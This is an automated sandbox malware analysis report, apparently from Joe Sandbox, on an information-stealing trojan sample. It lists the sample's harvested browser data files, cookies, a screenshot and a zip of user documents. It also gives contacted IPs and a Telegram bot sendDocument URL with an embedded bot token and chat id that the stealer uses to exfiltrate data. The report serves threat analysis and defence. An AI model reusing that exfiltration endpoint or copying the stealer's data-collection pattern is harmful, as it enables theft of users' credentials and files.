                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoSecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.257288164.000001C7F526C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.254238568.000001C7F524E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.255053673.000001C7F525E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.255427189.000001C7F526B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.255231964.000001C7F5263000.00000004.00000020.00020000.00000000.sdmp, coowoo_default_webdata.0.dr, liebao_default_webdata.0.dr, google_default_webdata.0.dr, kometa_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, ucozmedia_default_webdata.0.dr, mail.ru_default_webdata.0.dr, orbitum_default_webdata.0.dr, torch_default_webdata.0.dr, comodo_default_webdata.0.dr, opera stable_default_webdata.0.dr, browser_default_webdata.0.dr, microsoft_default_webdata.0.dr, vivaldi_default_webdata.0.dr, citrio_default_webdata.0.dr, coccoc_default_webdata.0.drfalse
                                		high
                                https://cdn.ipwhois.io/flags/ch.svgSecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000002.271754980.000001C7F38F1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.271121352.000001C7F38F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                https://search.yahoo.com?fr=crmas_sfpfSecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.257288164.000001C7F526C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.254238568.000001C7F524E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.255053673.000001C7F525E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.255427189.000001C7F526B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.255231964.000001C7F5263000.00000004.00000020.00020000.00000000.sdmp, coowoo_default_webdata.0.dr, liebao_default_webdata.0.dr, google_default_webdata.0.dr, kometa_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, ucozmedia_default_webdata.0.dr, mail.ru_default_webdata.0.dr, orbitum_default_webdata.0.dr, torch_default_webdata.0.dr, comodo_default_webdata.0.dr, opera stable_default_webdata.0.dr, browser_default_webdata.0.dr, microsoft_default_webdata.0.dr, vivaldi_default_webdata.0.dr, citrio_default_webdata.0.dr, coccoc_default_webdata.0.drfalse
                                  		high
                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=centbrowser_default_webdata.0.drfalse
                                    		high
                                    https://api.telegram.org/bot/sendDocument?chat_id=&caption=&parse_mode=HTMLSecuriteInfo.com.Variant.Tedy.308647.10806.1440.exefalse
                                      		high
                                      https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchSecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.257288164.000001C7F526C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.254238568.000001C7F524E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.255053673.000001C7F525E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.255427189.000001C7F526B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.255231964.000001C7F5263000.00000004.00000020.00020000.00000000.sdmp, coowoo_default_webdata.0.dr, liebao_default_webdata.0.dr, google_default_webdata.0.dr, kometa_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, ucozmedia_default_webdata.0.dr, mail.ru_default_webdata.0.dr, orbitum_default_webdata.0.dr, torch_default_webdata.0.dr, comodo_default_webdata.0.dr, opera stable_default_webdata.0.dr, browser_default_webdata.0.dr, microsoft_default_webdata.0.dr, vivaldi_default_webdata.0.dr, citrio_default_webdata.0.dr, coccoc_default_webdata.0.drfalse
                                        		high
                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=centbrowser_default_webdata.0.drfalse
                                          		high
                                          https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.257288164.000001C7F526C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.254238568.000001C7F524E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.255053673.000001C7F525E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.255427189.000001C7F526B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.255231964.000001C7F5263000.00000004.00000020.00020000.00000000.sdmp, coowoo_default_webdata.0.dr, liebao_default_webdata.0.dr, google_default_webdata.0.dr, kometa_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, ucozmedia_default_webdata.0.dr, mail.ru_default_webdata.0.dr, orbitum_default_webdata.0.dr, torch_default_webdata.0.dr, comodo_default_webdata.0.dr, opera stable_default_webdata.0.dr, browser_default_webdata.0.dr, microsoft_default_webdata.0.dr, vivaldi_default_webdata.0.dr, citrio_default_webdata.0.dr, coccoc_default_webdata.0.drfalse
                                            		high
                                            https://api.telegram.org/bot5749635914:AAHO1FmA3UVCNqptBOADqQF-cFGUoMOYe6g/sendDocument?chat_id=5493SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.271472602.000001C7F3912000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.271590858.000001C7F3923000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://docs.rs/getrandom#nodejs-es-module-supportCallingSecuriteInfo.com.Variant.Tedy.308647.10806.1440.exefalse
                                                		high

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                149.154.167.220
                                                		api.telegram.orgUnited Kingdom
                                                		62041TELEGRAMRUfalse
                                                195.201.57.90
                                                		ipwho.isGermany
                                                		24940HETZNER-ASDEfalse

                                                General Information

                                                Joe Sandbox Version:37.0.0 Beryl
                                                Analysis ID:822206
                                                Start date and time:2023-03-08 11:34:08 +01:00
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 7m 59s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:8
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample file name:SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                Detection:MAL
                                                Classification:mal76.troj.spyw.evad.winEXE@4/63@2/2
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HDC Information:
                                                • Successful, ratio: 1.3% (good quality ratio 0.6%)
                                                • Quality average: 21.9%
                                                • Quality standard deviation: 24.6%
                                                HCA Information:
                                                • Successful, ratio: 64%
                                                • Number of executed functions: 86
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Stop behavior analysis, all processes terminated

                                                Warnings

                                                • Exclude process from analysis (whitelisted): svchost.exe
                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size getting too big, too many NtCreateFile calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                11:35:03API Interceptor9x Sleep call for process: powershell.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                149.154.167.220Invoice_+_BL#8477585399PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                  DJKyf11jbu.exeGet hashmaliciousVector StealerBrowse
                                                    PURCHASE_ORDERS.pdf.exeGet hashmaliciousVector StealerBrowse
                                                      0exvdX9dtK.exeGet hashmaliciousLuca StealerBrowse
                                                        prodotto_agricolo.exeGet hashmaliciousAgentTeslaBrowse
                                                          SWIFT.exeGet hashmaliciousAgentTeslaBrowse
                                                            DHL_AWB_NO_#AWB_2450847453.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                              QKlZYq8uvE.exeGet hashmaliciousAgentTeslaBrowse
                                                                kredi_Karti_Hesap-_#U00d6zeti-_4508_0519.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                  PCd62ldmBI.exeGet hashmaliciousLuca StealerBrowse
                                                                    PCd62ldmBI.exeGet hashmaliciousLuca StealerBrowse
                                                                      e3hG4nFPWP.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                        Rust_LoL_Accounts_Checker.bin.exeGet hashmaliciousLuca StealerBrowse
                                                                          PO_&_BROCHURE.exeGet hashmaliciousAgentTeslaBrowse
                                                                            Angebotsanfrage-230603.exeGet hashmaliciousDarkCloudBrowse
                                                                              rINQUIRYFORPGL02PR348_DOC.exeGet hashmaliciousAgentTeslaBrowse
                                                                                e-dekont-20230303-0.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  DHL_AWB_NO_#1485504786.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    file.exeGet hashmaliciousClipboard Hijacker, ToxicEyeBrowse
                                                                                      sPrLK4Kxgh.exeGet hashmaliciousAgentTesla, GuLoaderBrowse

                                                                                        Domains

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        ipwho.is0exvdX9dtK.exeGet hashmaliciousLuca StealerBrowse
                                                                                        • 195.201.57.90
                                                                                        fgOzNLlJRt.dllGet hashmaliciousUnknownBrowse
                                                                                        • 195.201.57.90
                                                                                        fgOzNLlJRt.dllGet hashmaliciousUnknownBrowse
                                                                                        • 195.201.57.90
                                                                                        PCd62ldmBI.exeGet hashmaliciousLuca StealerBrowse
                                                                                        • 195.201.57.90
                                                                                        PCd62ldmBI.exeGet hashmaliciousLuca StealerBrowse
                                                                                        • 195.201.57.90
                                                                                        mhddos_proxy_linuxGet hashmaliciousUnknownBrowse
                                                                                        • 195.201.57.90
                                                                                        phlsJhwft7.exeGet hashmaliciousLuca StealerBrowse
                                                                                        • 195.201.57.90
                                                                                        phlsJhwft7.exeGet hashmaliciousLuca StealerBrowse
                                                                                        • 195.201.57.90
                                                                                        6pp5OyUc1P.exeGet hashmaliciousUnknownBrowse
                                                                                        • 195.201.57.90
                                                                                        qIZdIzF0MU.exeGet hashmaliciousUnknownBrowse
                                                                                        • 195.201.57.90
                                                                                        googleDriveDesktopAlbum14.exeGet hashmaliciousLuca StealerBrowse
                                                                                        • 195.201.57.90
                                                                                        googleDriveDesktopAlbum14.exeGet hashmaliciousLuca StealerBrowse
                                                                                        • 195.201.57.90
                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                        • 195.201.57.90
                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                        • 195.201.57.90
                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                        • 195.201.57.90
                                                                                        fg.exeGet hashmaliciousUnknownBrowse
                                                                                        • 195.201.57.90
                                                                                        Mf0iVV7Yjq.exeGet hashmaliciousAmadey, SmokeLoader, VidarBrowse
                                                                                        • 195.201.57.90
                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                        • 195.201.57.90
                                                                                        file.exeGet hashmaliciousCryptOne, DanaBot, Djvu, SmokeLoaderBrowse
                                                                                        • 195.201.57.90
                                                                                        file.exeGet hashmaliciousCryptOne, DanaBot, Djvu, Raccoon Stealer v2, SmokeLoaderBrowse
                                                                                        • 195.201.57.90
                                                                                        api.telegram.orgInvoice_+_BL#8477585399PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 149.154.167.220
                                                                                        DJKyf11jbu.exeGet hashmaliciousVector StealerBrowse
                                                                                        • 149.154.167.220
                                                                                        PURCHASE_ORDERS.pdf.exeGet hashmaliciousVector StealerBrowse
                                                                                        • 149.154.167.220
                                                                                        0exvdX9dtK.exeGet hashmaliciousLuca StealerBrowse
                                                                                        • 149.154.167.220
                                                                                        prodotto_agricolo.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 149.154.167.220
                                                                                        SWIFT.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 149.154.167.220
                                                                                        DHL_AWB_NO_#AWB_2450847453.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                        • 149.154.167.220
                                                                                        QKlZYq8uvE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 149.154.167.220
                                                                                        kredi_Karti_Hesap-_#U00d6zeti-_4508_0519.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 149.154.167.220
                                                                                        PCd62ldmBI.exeGet hashmaliciousLuca StealerBrowse
                                                                                        • 149.154.167.220
                                                                                        PCd62ldmBI.exeGet hashmaliciousLuca StealerBrowse
                                                                                        • 149.154.167.220
                                                                                        e3hG4nFPWP.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                        • 149.154.167.220
                                                                                        Rust_LoL_Accounts_Checker.bin.exeGet hashmaliciousLuca StealerBrowse
                                                                                        • 149.154.167.220
                                                                                        PO_&_BROCHURE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 149.154.167.220
                                                                                        Angebotsanfrage-230603.exeGet hashmaliciousDarkCloudBrowse
                                                                                        • 149.154.167.220
                                                                                        rINQUIRYFORPGL02PR348_DOC.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 149.154.167.220
                                                                                        e-dekont-20230303-0.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 149.154.167.220
                                                                                        DHL_AWB_NO_#1485504786.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 149.154.167.220
                                                                                        file.exeGet hashmaliciousClipboard Hijacker, ToxicEyeBrowse
                                                                                        • 149.154.167.220
                                                                                        sPrLK4Kxgh.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                        • 149.154.167.220

                                                                                        ASNs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        TELEGRAMRUInvoice_+_BL#8477585399PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 149.154.167.220
                                                                                        DJKyf11jbu.exeGet hashmaliciousVector StealerBrowse
                                                                                        • 149.154.167.220
                                                                                        PURCHASE_ORDERS.pdf.exeGet hashmaliciousVector StealerBrowse
                                                                                        • 149.154.167.220
                                                                                        0exvdX9dtK.exeGet hashmaliciousLuca StealerBrowse
                                                                                        • 149.154.167.220
                                                                                        prodotto_agricolo.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 149.154.167.220
                                                                                        ce8zqKvcuI.exeGet hashmaliciousGlupteba, Nymaim, PrivateLoader, Raccoon Stealer v2, RedLine, SmokeLoader, VidarBrowse
                                                                                        • 149.154.167.99
                                                                                        ce8zqKvcuI.exeGet hashmaliciousFabookie, Glupteba, ManusCrypt, PrivateLoader, Raccoon Stealer v2, RedLine, SmokeLoaderBrowse
                                                                                        • 149.154.167.99
                                                                                        SWIFT.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 149.154.167.220
                                                                                        DHL_AWB_NO_#AWB_2450847453.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                        • 149.154.167.220
                                                                                        eiDdri7Ceu.exeGet hashmaliciousVidarBrowse
                                                                                        • 149.154.167.99
                                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                                        • 149.154.167.99
                                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                                        • 149.154.167.99
                                                                                        QKlZYq8uvE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 149.154.167.220
                                                                                        file.exeGet hashmaliciousFabookie, ManusCrypt, Nymaim, RHADAMANTHYS, RedLine, Socelars, VidarBrowse
                                                                                        • 149.154.167.99
                                                                                        kredi_Karti_Hesap-_#U00d6zeti-_4508_0519.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 149.154.167.220
                                                                                        PCd62ldmBI.exeGet hashmaliciousLuca StealerBrowse
                                                                                        • 149.154.167.220
                                                                                        PCd62ldmBI.exeGet hashmaliciousLuca StealerBrowse
                                                                                        • 149.154.167.220
                                                                                        Oje3F2DrO9.exeGet hashmaliciousRedLine, VidarBrowse
                                                                                        • 149.154.167.99
                                                                                        WnXC0Vwern.exeGet hashmaliciousRedLine, VidarBrowse
                                                                                        • 149.154.167.99
                                                                                        e3hG4nFPWP.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                        • 149.154.167.220

                                                                                        JA3 Fingerprints

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        3b5074b1b5d032e5620f69f9f700ff0eQ1s8R325yL.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                        • 149.154.167.220
                                                                                        • 195.201.57.90
                                                                                        http://www.dnautik.com/wp-includes/UmAJjAP/?084030&c=1Get hashmaliciousUnknownBrowse
                                                                                        • 149.154.167.220
                                                                                        • 195.201.57.90
                                                                                        PaymentXinstruction.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                        • 149.154.167.220
                                                                                        • 195.201.57.90
                                                                                        AWB_#3827747403.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 149.154.167.220
                                                                                        • 195.201.57.90
                                                                                        DJKyf11jbu.exeGet hashmaliciousVector StealerBrowse
                                                                                        • 149.154.167.220
                                                                                        • 195.201.57.90
                                                                                        vGrj2wnIq0.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 149.154.167.220
                                                                                        • 195.201.57.90
                                                                                        PURCHASE_ORDERS.pdf.exeGet hashmaliciousVector StealerBrowse
                                                                                        • 149.154.167.220
                                                                                        • 195.201.57.90
                                                                                        RFQs.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 149.154.167.220
                                                                                        • 195.201.57.90
                                                                                        Purchase_Order.exeGet hashmaliciousFormBookBrowse
                                                                                        • 149.154.167.220
                                                                                        • 195.201.57.90
                                                                                        0exvdX9dtK.exeGet hashmaliciousLuca StealerBrowse
                                                                                        • 149.154.167.220
                                                                                        • 195.201.57.90
                                                                                        Banco_BPM_Payment_Copy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 149.154.167.220
                                                                                        • 195.201.57.90
                                                                                        prodotto_agricolo.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 149.154.167.220
                                                                                        • 195.201.57.90
                                                                                        U61rIZtEQ0.exeGet hashmaliciousUnknownBrowse
                                                                                        • 149.154.167.220
                                                                                        • 195.201.57.90
                                                                                        SWIFT.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 149.154.167.220
                                                                                        • 195.201.57.90
                                                                                        YurZ8ET6Jx.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 149.154.167.220
                                                                                        • 195.201.57.90
                                                                                        v52ebhv83P.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 149.154.167.220
                                                                                        • 195.201.57.90
                                                                                        AwOGqGHgec.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 149.154.167.220
                                                                                        • 195.201.57.90
                                                                                        3CLwJwHgia.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 149.154.167.220
                                                                                        • 195.201.57.90
                                                                                        nPfA26V0qI.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 149.154.167.220
                                                                                        • 195.201.57.90
                                                                                        ycv181LVaT.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 149.154.167.220
                                                                                        • 195.201.57.90

                                                                                        Dropped Files

                                                                                        No context

                                                                                        Created / dropped Files

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):64
                                                                                        Entropy (8bit):0.9260988789684415
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Nlllulb/lj:NllUb/l
                                                                                        MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                                                                                        SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                                                                                        SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                                                                                        SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                                                                                        Malicious:false
                                                                                        Reputation:high, very likely benign file
                                                                                        Preview:@...e................................................@..........

                                                                                        C:\Users\user\AppData\Local\Temp\Tf1fTKN9EhSgWt7S8swS8tNH3PELke\cookies_google_default.txt

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):79
                                                                                        Entropy (8bit):4.463600256186029
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:wKCJuBGKQTWWfQP/VWfsEUR1R8:/vcKQTW5PMe1R8
                                                                                        MD5:2816CB2BF9CDB1527968E73CA7CEAB2C
                                                                                        SHA1:E63749B2F0B46642C6837292136378325289F5AA
                                                                                        SHA-256:84F8A3ADF1B8995063D573CF56F1BCDC4537F2338644E6140E9D97688D86FF94
                                                                                        SHA-512:F3025778A56291005A947031213E3D2EC2C0A075E8580CFFE0BA7B4AB76CCB53748477A1CE1BA225DE879D22EB1CBE96A2C181370332AE85012DF21C9B518B30
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:ogs.google.com.true./.TRUE.13307751346000000.OTZ.6639696_84_88_104280_84_446940

                                                                                        C:\Users\user\AppData\Local\Temp\Tf1fTKN9EhSgWt7S8swS8tNH3PELke\screen1.png

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                        Category:dropped
                                                                                        Size (bytes):1119661
                                                                                        Entropy (8bit):7.977387346368672
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:qcVC5TsDuDeuRXbARrT9NkQhsh3/NzaQGnvjt/pWPuEVtDjX8Xmw:qdiuD1XgrTUQWhlzaNrt/pkHVtHZw
                                                                                        MD5:D4A4667F6436A47EABAF6EC8E44046B3
                                                                                        SHA1:09E452E0789C00FA741DCA3EBDFA5E18795600D5
                                                                                        SHA-256:06F6B8BA29905FA070A007B38E8F8A8B305A96F0453DEA80ED32854627A73BCD
                                                                                        SHA-512:29F90BB7046A6D40BD13210DB7C91E84979BBDD48E0F4918B73975753A5904C616ACCB339DA94F54E7EC4B1A93556434C37649683D7DB35570475D0F20D8BA29
                                                                                        Malicious:false
                                                                                        Preview:.PNG........IHDR................C...tIDATx..}..eE...^..af.YP$..."I.UDA.JP.....(..k.5.......ov..Y.]PD...(.....3.Df....soU...==.on....u.y......d>.J...`..Q..Ex@..y.L6f.../....\g..Y....X..C.....H..D."rr..yx.~..1.%...E...#...a.`..Q.-.|g.3.aNT.|..Yg..M..a..Og....24.i.....U...czY.!..\.d..cFR.i.ZQ|=.$..l...R6.f.h....u~.2h..k.`.X....8...`aY...nB....J..C.qq:.....B..[....{n.t.....K.B=M.6......6.?.2.K......,$~^o`s.qt...-.....v....6.....wCC(....a...=....7..R.o.=....j...UH..N<.a...@......?>...O}|.T....!g.877.$..s[<=9L....<..c.G.z.....Y-a..-.W{....x_..H.r_..H..~.r.z....6.v.l...F.W......Tt;,X.....>...c..../.c.\. ..ys."...o.5Un.G........@.].....l.,.y6....i?5.;.....H.m.. ./.G[.~...B[....An.......`.h...5....,..H..d...0w.K7...*w..S.:.R.6....5.Op.P.7.%.\..%......;<....X.{P....H..'f.....ZC.A.&o8.n,.m...........g.u.!.q f..f...g.(.1...e.=@.......E...&...?..am..H...\....R...my...........%:'m..._..z.O..G....l.:<.N.k.@...p}.R......C.q..>.|...t....AY.8aH..?..<.1..>^a

                                                                                        C:\Users\user\AppData\Local\Temp\Tf1fTKN9EhSgWt7S8swS8tNH3PELke\sensfiles.zip

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                        Category:dropped
                                                                                        Size (bytes):27174
                                                                                        Entropy (8bit):5.012124470430864
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:I/fy6/fyaII5II8FSLtkTzZr/fy6/fyaII5II8FSLtkTzZFv:XZaII5II8FSRLZaII5II8FSRo
                                                                                        MD5:6C309D5B0F362968136B4F5AE668F030
                                                                                        SHA1:1DD261A04E6B5A1C362E2766227A68500982F050
                                                                                        SHA-256:ACBC97C5EA9D69C2BCD42A80528E6F1F60B863577820D83AE5773D4E74EB8C93
                                                                                        SHA-512:07B7BF6E097CE1122E1498C6C5D2D69D8AD351A8D9263EED887D75065AB9170B4FA0F66DCCABC110CC90861226D7A2A57806A957ED171FB7DE5F59DCD02ACD2C
                                                                                        Malicious:false
                                                                                        Preview:PK........k.hVR...............AQRFEVRTGL.docxAQRFEVRTGLRPNVUMAMHTYETEVGDENHEHZDAQRXZQCDHHLTUZIEJRCQGGPRQWBIYWADWJEZTAELERKZUDZJHSFVIUPBTJVGKYQFWVMPTQUZUZZSOJNBOABYGRCYMPSQARVQUZQVCNVECXPCBIEBYWXWSRMTKFKBEHRJGIPFMOYSZMEELAQPGBHDTUPVXJROQBNFXLTFTPQHVAGKBRLNHZRZVUTEGANMGKVRFJJNOMKLVMQNTHIORPQCPGNIZSOYKXAQJCOPIGBQRJINVPIRVOHHCOGWQPXWQEGDKAHJASRIJBIMZDOWPSCSZZQNZFPNLCIRCXKLGBVXKUJASQXRHFULXFGHARZKMVRSMXPJPUDKEQXOSCEBAKVRLNKSSEVKXVMESKRHMKSXSUKELGCEYTRDUXROEARVKPGFZHNSDRPAQVQVSCJPHBVIRZPYJKRBBZNOUQWXJMMJNDFWGGJPGQMMWRHVVMGZTXMHGJMPQFKEKIAULKOFHNCPDGWVUWIVKGZHFAQVQOBPOUZZTMTUXLURTPHPWRVYABSKGEOJTHCTJYEQSHAVPELOSNLRXFRVWMHJRZTZLGKGNKELBIANUAYANWKNNJPQUXDOBXLYTGIGYZMXXBSVTKCOWSZHFODTFONXVLBRUGJKEZMTIRWSGAANCFOWQHTMLCODGMRHITYHVPOCCXAYGLOXHITQDUATUBKLPLHFHTHTEONDGTWZOQVYRUABLZCNSDXFSTUTQJACVNWWCLMGVDGIDXECYLUJKBUKWQQUERSQSLBAKCXGRYMXSMUPSLSRDICMSQOGBWCATEAACXPGZFMXCSVNIZUQRAQEWTFWYKNKMGGMAZDJHXXORIHLHSPMGKAWZUQOKTRGEGDEPETKDTOVQKFNIASUNQNVNPECXIFOSOXOYCRVRJAKLVRMRCMTVZUHFLJPYFXCUSTATJHRIINTHARIA

                                                                                        C:\Users\user\AppData\Local\Temp\Tf1fTKN9EhSgWt7S8swS8tNH3PELke\user_info.txt

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:Unicode text, UTF-8 text, with CRLF, LF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):604
                                                                                        Entropy (8bit):5.435491610811449
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:eM3CBs0bVhvZofQ8Fxx6YVPrJFSlQM7NlVSOiBQM3aWfgHdAhC7j01Dq:etrvg3xxVr9M7NlVCe8GAhajUDq
                                                                                        MD5:6F5558CAC5B11CE708A959C1E3B6D3A7
                                                                                        SHA1:121166167BBD805423A393A16795119115FA8CEE
                                                                                        SHA-256:0A44CC74E02B2387DC6430FB148CD082FB29ADAA3199E86453D8B423741C9B36
